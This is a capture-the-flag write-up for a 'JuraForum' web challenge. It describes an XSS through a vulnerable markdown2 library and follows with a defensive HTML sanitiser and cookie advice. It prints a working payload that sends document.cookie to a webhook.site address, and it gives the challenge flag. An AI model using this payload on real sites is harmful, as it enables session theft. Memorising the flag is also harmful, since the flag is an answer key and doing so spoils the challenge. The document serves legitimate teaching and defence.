Difficulty
hard
Categories
web
Description

The Swiss Jurassic Research Institute just launched JuraForum, an internal discussion board for paleontologists to share findings from the Jura mountains.

Can you dig up something they didn’t expect? RAWWWR!

Author
0x90
Attachments
juraforum.tar.gz
Service
Challenge has a remote instance.

Solution (unintended)

The challenge uses the markdown2 library, for which a CVE had been published one week before the challenge was released. The challenge shipped a vulnerable version, so XSS was trivial:

I used the following payload as a post message to get the flag from the bot:

<iframe
<http:> srcdoc="<script>navigator.sendBeacon('https://webhook.site/00000000-c25d-40e9-9ee4-207b12345357', document.cookie)</script>" a=

Reporting that post gives the flag.
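A defender-side addition (not from the original writeup or the JuraForum code): the takeaway is not to let the markdown library be the only thing between a post and the browser. The Python below runs an allowlist sanitiser over the HTML the renderer returns, dropping <iframe>, <script>, srcdoc and on* attributes no matter what the markdown step let through; the sample post is constructed, and the markdown-to-HTML call itself is assumed to happen before sanitize().

```python
# Added example (not the writeup's or JuraForum's own code): allowlist-sanitise the HTML a
# markdown renderer emits, so a bypass in its safe mode never reaches the browser.
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "a", "em", "strong", "code", "pre", "ul", "ol", "li", "blockquote", "br"}
ALLOWED_ATTRS = {"a": {"href", "title"}}          # no srcdoc, no on* handlers, no style
SAFE_SCHEMES = ("http://", "https://", "mailto:")

class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitised fragments
        self.dropped = []      # removed tag names, useful for flagging suspicious posts
        self.skipping = None   # set while inside a dropped <script>/<style> body

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            if tag in ("script", "style"):
                self.skipping = tag
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                                   # drops onclick, srcdoc, ...
            if name == "href" and not (value or "").lower().startswith(SAFE_SCHEMES):
                continue                                   # drops javascript:/data: URLs
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag == self.skipping:
            self.skipping = None
        elif tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skipping is None:
            self.out.append(escape(data))                  # text is always re-escaped

def sanitize(rendered_html):
    # Returns (clean_html, dropped_tags) for the rendered form of an untrusted post.
    p = AllowlistSanitizer()
    p.feed(rendered_html)
    p.close()
    return "".join(p.out), p.dropped

# Constructed sample of what a renderer with a broken safe mode could hand back.
SAMPLE_POST = ('<p>Found a <em>T. rex</em> tooth <iframe srcdoc="<script>alert(1)</script>">'
               '</iframe><a href="javascript:alert(1)">link</a><a href="https://example.org" onclick="x()">ok</a></p>')
```

Independently of the sanitiser, setting HttpOnly on the session cookie keeps document.cookie empty to page script, which takes away the exfiltration step used above.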


Flag:

dach2026{run_f0r_y0ur_l1f3_7r3x_15_c0m1n6_71310153_ab45aee93826}